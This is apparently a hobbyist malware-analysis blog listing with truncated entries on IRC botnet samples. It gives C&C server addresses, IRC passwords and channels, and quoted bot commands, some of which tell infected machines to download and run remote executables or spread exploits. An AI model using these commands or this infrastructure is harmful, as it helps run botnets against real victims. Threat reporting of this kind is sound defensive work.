Author: Pig

Interessing malware here some infos i got from the exe: a.ip-163.com DNS_TYPE_A 174.139.61.74 what it does: Write to foreign memory areas: This executable tampers with the execution of another process. Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary. Start/Install windows service: This executable starts a windows service. ServicesRead more...

Remote Host Port Number 199.15.234.7 80 31.186.102.186 8765 PASS secret NICK n{US|XPa}vhxkqvn USER vhxkqvn 0 0 :vhxkqvn JOIN #GODS secret hosting infos: http://whois.domaintools.com/31.186.102.186

Domains used to control bots: www.facebookvideocentral.com 46.45.164.166 www.merkurvideo.com 46.45.164.166 www.pr0.net 74.206.242.164 C&C Server: 46.45.164.166:81 Server Password: Username: SP3-431 Nickname: [00_DEU_XP_6037696] Channel: #i (Password: ) Channeltopic: :.asc -S -s |.http http://46.45.164.165/iii.exe |.asc exp_all 15 5 0 -c -e |.asc exp_all 15 5 0 -b -r -e |.asc exp_all 15 5 0 -c |.asc exp_all 10 5Read more...

Resolved : [xL.x1x2.in] To [95.142.167.131]port 4949 for irc Resolved : [xL.x1x2.in] To [95.142.166.253]port 4949 for irc Resolved : [xL.x1x2.in] To [92.243.15.137]port 4949 for irc Resolved : [xL.x1x2.in] To [103.1.184.45]port 4949 for irc Remote Host Port Number 176.9.42.247 8332 Bitcoin Malware 199.15.234.7 80 199.7.176.144 80 199.7.177.228 80 74.120.10.153 80 74.120.8.161 80 95.142.167.131 4949 irc port (beforeRead more...

Remote Host Port Number 118.69.220.81 6667 PASS weed Clients: I have 110 clients and 0 servers Local users: Current Local Users: 110 Max: 115 Global users: Current Global Users: 110 Max: 115 MODE [00|USA|XP|SP2]-8799 +x JOIN ##vam## vampir123 USERHOST [00|USA|XP|SP2]-8799 PONG :Vampir.hack-mx.ru.net NICK [00|USA|XP|SP2]-8799 USER pmlai 0 0 :[00|USA|XP|SP2]-8799 hosting infos: http://whois.domaintools.com/118.69.220.81

Today i noticed that a big hecker tryed to heck into one of my websites here i m posting the script used to atack the web site u have to decrypt it if u want to know more lol First he use this website to host his shit: http://picasa.com.syscommx.com/ and his l33t hecker script isRead more...

205.234.187.241:2345 Nick: New[AUT|00|P|64491] Username: XP-9383 Joined Channel: #!loco! Channel Topic for Channel #!loco!: “.m.s|.m.e Foto http://goo.gl/TYFFS?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]: Thread Disabled.” Private Message to User New[AUT|00|P|64491]: “.hp http://domredi.com/1/” hosting infos: http://whois.domaintools.com/205.234.187.241

Remote Host Port Number 31.210.98.14 6667 NICK Maceachern PING Maceachern NICK _A_R_Z_U_ USER Woods-Powe “” “p2c.ekolik.net” :biliamee USERHOST _A_R_Z_U_ MODE #seo JOIN #!x! MODE #!x! USER Peters “” “p2c.ekolik.net” :coralyn PING _A_R_Z_U_ USERHOST Maceachern hosting infos: http://whois.domaintools.com/31.210.98.14

C&C Server: 69.175.32.237:6667 Server Password: Username: msgvvei Nickname: A[DE-XPC]msgvvei Channel: #KCA (Password: KCA) Channeltopic: :!j #X Now talking in #X Topic On: [ #X ] [ !j #XX !mdns http://69.175.32.237/~face/av.txt !mod usbi on ] Topic By: [ KCA ] UPDATE: PRIVMSG #aryan :[AryaN]: Successfully Executed Process: “C:Documents and SettingsUserNameApplication Data10915679120753.exe” NICK A[US-XPC]zjqsrws USER zjqsrws 0Read more...